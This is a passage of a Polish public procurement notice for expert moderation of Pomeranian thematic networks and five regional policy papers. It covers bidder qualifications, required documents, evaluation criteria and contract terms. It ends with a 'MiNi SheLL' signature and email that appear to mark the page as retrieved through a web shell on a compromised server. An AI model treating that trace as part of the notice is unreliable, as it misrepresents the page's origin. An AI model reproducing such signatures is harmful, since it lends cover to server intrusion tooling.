4.	Wymagania względem każdego z 5 dokumentów policy paper, o których mowa w ust. 3 pkt. 1) i 2):
1)	Wymagane obligatoryjnie minimum metodologiczne dokumentów sektorowych typu policy paper każdorazowo obejmuje analizę danych zastanych (Desk research) obejmującą m.in. obligatoryjnie:  
- protokoły i sprawozdania analityczne z posiedzeń PST, 
- analizy eksperckie sporządzane na potrzeby PST,
- wyniki badań zrealizowanych w ramach projektu System Inteligencji Regionalnej - kompleksowe planowanie rozwoju i zarządzanie zmianami gospodarczymi na Pomorzu - w przypadku ich dostępności na dzień piątego posiedzenia POPA, 
- Strategię Rozwoju Województwa Pomorskiego 2020, 
- Regionalne Programy Strategiczne.
2)	Tekst główny każdego z 5 dokumentów policy paper, o których mowa w ust. 3 pkt. 1) i 2) nie powinien liczyć więcej niż 15 stron i nie mniej niż 7 stron z wyłączeniem streszczenia i ewentualnych załączników, przyjmując średnio 2 300 znaków na stronę. Oprócz definicji problemu, omówienia potencjalnych rozwiązań, każdy z dokumentów musi zawierać rekomendacje oraz wstępny zarys monitoringu i ewaluacji. 
3)	Wykonawca zobowiązany jest przesłać 5 dokumentów policy paper Zamawiającemu, celem weryfikacji spełniania wymogów o których mowa w pkt. 1) - 2).

§5. Szczegółowe uregulowania dotyczące sposobu wykonania zamówienia zostały wskazane w projekcie umowy, który stanowi załącznik nr 6  do SIWZ.

 Dodatkowo Zamawiający informuje, że:
1)	Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
2)	Zamawiający nie dopuszcza możliwości składania ofert częściowych.
3)	Zamawiający nie przewiduje dokonywania zamówień uzupełniających.
4)	Rozliczenia między Zamawiającym a Wykonawcą prowadzone będą w PLN.
5)	Zamawiający nie przewiduje aukcji elektronicznej. 
6)	Zamawiający nie przewiduje zwrotu kosztów udziału w niniejszym postępowaniu.
7)	Zamawiający nie przewiduje zawarcia umowy ramowej.
8)	Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów. 
9)	Zamawiający nie ogranicza możliwości ubiegania się o zamówienie publiczne tylko dla Wykonawców,  u których ponad 50% pracowników stanowią osoby niepełnosprawne. 
10)	Postępowanie prowadzone jest w języku polskim..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.10.00-9, 71.62.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdz. VI ust.1 pkt. 1 (wzór oświadczenia stanowi załącznik nr 2  do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na dowód posiadania wiedzy i doświadczenia Wykonawca udokumentuje należyte wykonanie w  okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie, co najmniej:       
Jednej z usług badawczych  lub naukowych  w obszarach tematycznych określonych w opisie przedmiotu zamówienia, których wynikiem było:          
a)	Co najmniej  dwie publikacje naukowe lub badawcze prowadzone w co najmniej jednym 
z następujących obszarów tematycznych: upowszechnianie innowacji w przedsiębiorstwach i transfer innowacji do gospodarki; wsparcie inicjatyw klastrowych i przedsięwzięć realizowanych przez klastry; wsparcie ekspansji zagranicznej przedsiębiorstw; pozyskiwanie inwestycji zewnętrznych; zapewnianie dostępu do sieci szerokopasmowego Internetu, w tym sieci o bardzo wysokiej przepustowości; 






b)	 Co najmniej dwie publikacje naukowe lub badawcze prowadzone w co najmniej jednym z następujących obszarów tematycznych: aktywizacja biernych zawodowo i bezrobotnych; wspieranie rozwoju mikro i małych przedsiębiorstw; 
c)	Co najmniej dwie publikacje naukowe lub badawcze prowadzone w co najmniej jednym z jednym z następujących obszarów tematycznych: poprawa jakości ponadgimnazjalnego kształcenia zawodowego i kształcenia ustawicznego. 
Ocena wykazania spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w rozdz. VI ust.1 pkt 2 (wzór wykazu usług stanowi załącznik nr 5 do SIWZ) oraz oświadczenia, o którym mowa w rozdz. VI ust.1 pkt 1 (wzór stanowi załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdz. VI ust.1 pkt. 1 (wzór oświadczenia stanowi załącznik nr 2  do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże, że dysponuje (lub przedstawi pisemne zobowiązanie innych podmiotów o udostępnieniu mu) zespołem, składającym się z co najmniej:
a)	trzech moderatorów-ekspertów, posiadających dorobek badawczy lub naukowy  lub doświadczenie zawodowe w zakresie zagadnień wchodzących w skład obszarów tematycznych przypisanych dla danej PST (wynikające np. z aktualnie wykonywanego zawodu, dotychczasowego doświadczenia zawodowego, dorobku naukowego, czy zrealizowanych prac eksperckich):
- w zakresie analiz społeczno - gospodarczych rozwoju wyodrębnionego pod względem administracyjnym lub geograficznym obszaru, 
- w zakresie analizy wpływu czynników międzynarodowych na rozwój wyodrębnionego pod względem administracyjnym lub geograficznym obszaru, w tym co najmniej 2 dotyczących województwa pomorskiego,
- w zakresie stosowania metod i technik przeprowadzania badań społeczno - gospodarczych, w realizacji badań ilościowych i jakościowych oraz prowadzeniu analiz i interpretacji uzyskanych z nich danych,
- w postaci posiadania łącznego stażu zawodowego nie mniejszego niż 10 lat,
- w postaci posiadania dorobku w formie autorstwa lub współautorstwa co najmniej dwóch raportów badawczych poświęconych problematyce rozwoju regionalnego w Polsce.
b)	eksperta ekspertów - uczestników posiedzeń POPA posiadających kwalifikacje i doświadczenie zawodowe w obszarze zagadnień wchodzących w skład obszarów tematycznych wskazanych dla dokumentów policy paper (wynikające np. z aktualnie wykonywanego zawodu, dotychczasowego doświadczenia zawodowego, dorobku naukowego czy zrealizowanych prac eksperckich):
- w zakresie analiz społeczno - gospodarczych rozwoju wyodrębnionego pod względem administracyjnym lub geograficznym obszaru, 
- w zakresie analizy wpływu czynników międzynarodowych na rozwój wyodrębnionego pod względem administracyjnym lub geograficznym obszaru, w tym co najmniej 
1 dotyczących województwa pomorskiego, 
- w zakresie stosowania metod i technik przeprowadzania badań społeczno - gospodarczych, w realizacji badań ilościowych i jakościowych oraz prowadzeniu analiz i interpretacji uzyskanych z nich danych,
- w postaci posiadania łącznego stażu zawodowego nie mniejszego niż 10 lat,
- w postaci posiadania dorobku w formie autorstwa lub współautorstwa co najmniej dwóch raportów badawczych poświęconych problematyce rozwoju regionalnego w Polsce. 
Zamawiający zastrzega, że wyżej wskazane funkcje poszczególnych osób nie mogą być łączone.







Ocena wykazania spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w rozdz. VI ust.1 pkt 3 (wzór wykazu osób stanowi załącznik nr 4 do SIWZ) oraz oświadczenia,  o którym mowa w rozdz. VI ust.1 pkt  1 (wzór stanowi załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdz. VI ust.1 pkt. 1 (wzór oświadczenia stanowi załącznik nr 2  do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W celu wykazania spełniania przez Wykonawcę warunków, o których mowa w rozdziale V ust. 1, Zamawiający żąda następujących dokumentów:
1)	Oświadczenia Wykonawcy  o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (wzór oświadczenia stanowi załącznik nr 2 do SIWZ). 
2)	wykaz wykonanych usług w  zakresie niezbędnym do wykazania spełnienia warunku wiedzy 
i doświadczenia w okresie ostatnich (3) trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie  (wzór formularza wykazu wykonanych usług stanowi załącznik nr 5 do SIWZ).
3)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia,  wraz  z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami (wzór formularza wykazu osób stanowi załącznik nr 4 do SIWZ).







4)	Pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, w przypadku, jeśli wykonawca będzie polegał na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia innych podmiotów. 
2.	W celu wykazania braku podstaw do wykluczenia z niniejszego postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Zamawiający żąda następujących dokumentów: 
1)	oświadczenie o braku podstaw do wykluczenia (wzór formularza oświadczenia stanowi załącznik  nr  3 do SIWZ),
2)	aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Prawo zamówień publicznych, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
3)	 informację wykonawcy dot. Grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych  (art. 26 ust. 2d ustawy - wzór załącznik nr 3a)
3.	Udział w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. 
2)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania w postępowaniu 
i zawarcia umowy w sprawie niniejszego zamówienia publicznego. 
3)	Wykonawcy, o których mowa w pkt. 1, ponoszą solidarną odpowiedzialność za wykonanie zamówienia. 
4)	Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi złożyć dokumenty, 
o których mowa w niniejszym rozdziale w ust. 2 pkt 1-3
5)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia złożą łącznie Formularz oferty oraz jeden komplet dokumentów, o których mowa w niniejszym rozdziale ust. 1 pkt 1-3. Dokumenty te powinny być przygotowane w taki sposób, aby Zamawiający mógł dowiedzieć się, jaki udział w wykonaniu zamówienia będzie miał każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
4.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 2 pkt 2 - składa dokument lub dokumenty wystawione 
w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
5.	Dokumenty, o których mowa w ust. 4 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6.	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 4, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy,  złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.  Do aktualności tego dokumentu mają odpowiednie zastosowanie zapisy ust.  5.;
7.	Dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega za zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów -  poświadczone za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty. Dokumenty sporządzone w języku obcym należy składać wraz z tłumaczeniem na język polski.
8.	Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na wiedzy 
i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go i nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 






9.	Wykonawca wraz z ofertą, składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych, albo informację o tym, że nie należy do grupy kapitałowej. 
10.	Brak jakiegokolwiek z dokumentów wymaganych w SIWZ, lub złożenie dokumentu w niewłaściwej formie spowoduje wykluczenie Wykonawcy z postępowania oraz uznanie jego oferty za odrzuconą,  
z zastrzeżeniem ust. 11 niniejszego rozdziału.
11.	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów potwierdzające spełnienie:
a)	warunków udziału w postępowaniu 
b)	wymagań określonych przez Zamawiającego lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w pkt a) i b), zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.
12.	Dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 




1.4.	Zamawiający oceni kryterium wskazane w pkt 1.2. Metodologia i sposób realizacji zamówienia na podstawie przedstawionego przez Wykonawcę do oferty Szczegółowego opisu sposobu realizacji przedmiotu zamówienia.
1.4.1.	Szczegółowy opis sposobu realizacji przedmiotu zamówienia - sporządzony przez Wykonawcę i załączony do oferty - musi dotyczyć obu wskazanych w opisie przedmiotu zamówienia  segmentów zamówienia tj. (określone zapisami rozdziału III SIWZ segmenty I i II) oraz zawierać co najmniej następujące informacje: 
a)	Opis koncepcji moderowania i koordynowania prac trzech PST, działających w obszarach związanych z adaptacyjnością przedsiębiorstw i ich pracowników w województwie pomorskim (PST ds. wysokiej efektywności przedsiębiorstw; PST ds. wysokiego poziomu zatrudnienia; PST ds. wysokiej jakości kształcenia zawodowego i ustawicznego), uwzględniający obligatoryjnie: rolę i zakres zadań moderatora-eksperta każdej z trzech PST; propozycję merytorycznej koordynacji i współpracy pomiędzy członkami każdej z PST; propozycję rodzajów zadań i prac dla członków PST, wynikających z koncepcji funkcjonowania i tematyki poszczególnych PST; identyfikację obszarów ryzyka w zakresie moderowania i koordynowania prac każdej z PST wraz z propozycją środków je minimalizujących.







b)	Propozycję tematów, kwestii i zagadnień, które powinny zostać poddane dyskusji i analizie podczas prac poszczególnych PST wraz z uzasadnieniem ich zgodności z wyjściowym zakresem tematycznym danej PST oraz przydatności i niezbędności ich podjęcia dla osiągnięcia zakładanych celów i efektów działalności każdej z PST.
c)	Zawierający uzasadnienie opis proponowanych metod, narzędzi, technik wykorzystywanych w efektywnym planowaniu i organizacji współpracy pomiędzy poszczególnymi PST, a także pomiędzy PST a POPA (zarówno w czasie posiedzeń, jak i pomiędzy nimi), z uwzględnieniem sposobów zagwarantowania rzetelności wszystkich zastosowanych narzędzi wraz ze wskazaniem kanałów i sposobów komunikacji na linii PST - PST, PST - POPA.
d)	Propozycję metodologicznej konstrukcji i zawartości sprawozdań analitycznych sporządzanych przez moderatora-eksperta z każdego posiedzenia danej PST, dotyczących tematyki danego posiedzenia oraz bazujących na wypracowanych w jego trakcie wnioskach i opracowanych na potrzeby danego posiedzenia analizach eksperckich.
e)	Opis potencjalnych obszarów ryzyka w zakresie prac nad sprawozdaniami analitycznymi sporządzanymi przez moderatora-eksperta z każdego posiedzenia danej PST oraz adekwatność propozycji środków je minimalizujących.
f)	Sposób prezentacji wyników, wniosków i rekomendacji ze sprawozdań analitycznych z każdego posiedzenia danej PST oraz 4 dokumentów typu policy paper w zakresie adaptacyjności przedsiębiorstw i pracowników z województwa pomorskiego i 1 dokumentu typu policy paper w zakresie wdrażania interwencji ze środków Unii Europejskiej w perspektywie 2014-2020.
1.4.2.	Jeżeli Wykonawca w Szczegółowym opisie sposobu realizacji przedmiotu zamówienia nie zawrze którejkolwiek z informacji wymienionych w pkt. 1.4.1 ., niezbędnej do oceny oferty zgodnie z kryteriami, o których mowa w pkt.  1.2.  to otrzyma odpowiednio mniejszą liczbę punktów. 
1.4.3.	W przypadku nie dołączenia do oferty Szczegółowego opisu sposobu realizacji przedmiotu zamówienia oferta Wykonawcy zostanie odrzucona jako niezgodna z zapisami SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Metodologia i sposób realizacji zamówienia - 60</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>8.	Istotne zmiany postanowień Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru  Wykonawcy mogą dotyczyć:
1)	terminu realizacji zamówienia,
2)	warunków i terminów płatności,






3)	zmiany osoby moderatora-eksperta, o którym mowa w rozdziale III §3 ust. 4 pkt. 1) SIWZ, oraz eksperta - uczestnika posiedzeń POPA, o którym mowa w rozdziale III §4 ust. 3 pkt. 4) , 
4)	zmiany zakresu merytorycznego zamówienia, określonego zapisami rozdziału III SIWZ. 
9.	Zmiany, o których mowa w ust. 8:
1)	w zakresie pkt. 1), 2) w przypadku wystąpienia siły wyższej. Pod pojęciem siły wyższej Zamawiający rozumie okoliczności, które pomimo zachowania należytej staranności są nieprzewidywalne oraz, którym nie można zapobiec lub przeciwstawić się skutecznie.  O braku możliwości dotrzymania terminu Wykonawca obowiązany jest niezwłocznie powiadomić Zamawiającego, określając jednocześnie nowy termin realizacji zamówienia, 
2)	w zakresie pkt. 2) w przypadku: zmian powszechnie obowiązujących przepisów prawa 
w trakcie realizacji umowy, lub regulacji dot. wykorzystania środków budżetowych, 
3)	w zakresie pkt. 1), w przypadku przedłużenia terminu zakończenia postępowania o udzielenie zamówienia,
4)	w zakresie pkt. 3) w przypadku wystąpienia niezawinionych przez Wykonawcę okoliczności uniemożliwiających realizację zamówienia zgodnie z ofertą i jedynie za pisemną zgodą Zamawiającego, udzieloną w odpowiedzi na pisemny wniosek Wykonawcy. Zgoda może zostać udzielona pod warunkiem zapewnienia przez Wykonawcę nowego/-ych członka/-ów i który/-rzy posiadać będą doświadczenie i kwalifikacje zawodowe co najmniej równorzędne jak wskazane w SIWZ, 
5)	w zakresie pkt. 4) w przypadku wystąpienia niezawinionych przez Wykonawcę szczególnych okoliczności uniemożliwiających realizację zamówienia zgodnie z ofertą i jedynie za pisemną zgodą Zamawiającego, udzieloną w odpowiedzi na pisemny wniosek Wykonawcy. Zgoda może zostać udzielona pod warunkiem zapewnienia przez Wykonawcę że zmiana zakresu merytorycznego umowy nie nastąpi ze szkodą dla Zamawiającego.
10.	Zmiany, o których mowa w ust. 8 pkt. 4) nie mogą dotyczyć zmiany celów Zamówienia jak również nie mogą dotyczyć obowiązku opracowania oraz dostarczenia Zamawiającemu analiz eksperckich oraz dokumentów sektorowych typu policy paper, o których mowa w rozdziale III §3 ust. 4 pkt. 2) i §4 ust. 3 pkt. 1) i 2) SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorskie.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Pomorskiego ul. Okopowa 21/27, 80-810 Gdańsk,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2013 godzina 09:00, miejsce: Kancelaria Ogólna Urzędu Marszałkowskiego Województwa Pomorskiego ul. Okopowa 21/27, 80-810 Gdańsk, pokój nr  4a (czynna w dni robocze: od poniedziałku do piątku od godz. 7.45 do godz. 15.45).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest wykonanie obsługi merytorycznej Pomorskich Sieci Tematycznych oraz opracowanie 5 dokumentów typu policy paper w oparciu o efekty i wnioski z prac Pomorskich Sieci Tematycznych i z udziałem Pomorskiego Obserwatorium Procesów Adaptacyjnych  w ramach projektu systemowego Samorządu Województwa Pomorskiego pn. System Inteligencji Regionalnej - kompleksowe planowanie rozwoju i zarządzanie zmianami gospodarczymi na Pomorzu..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com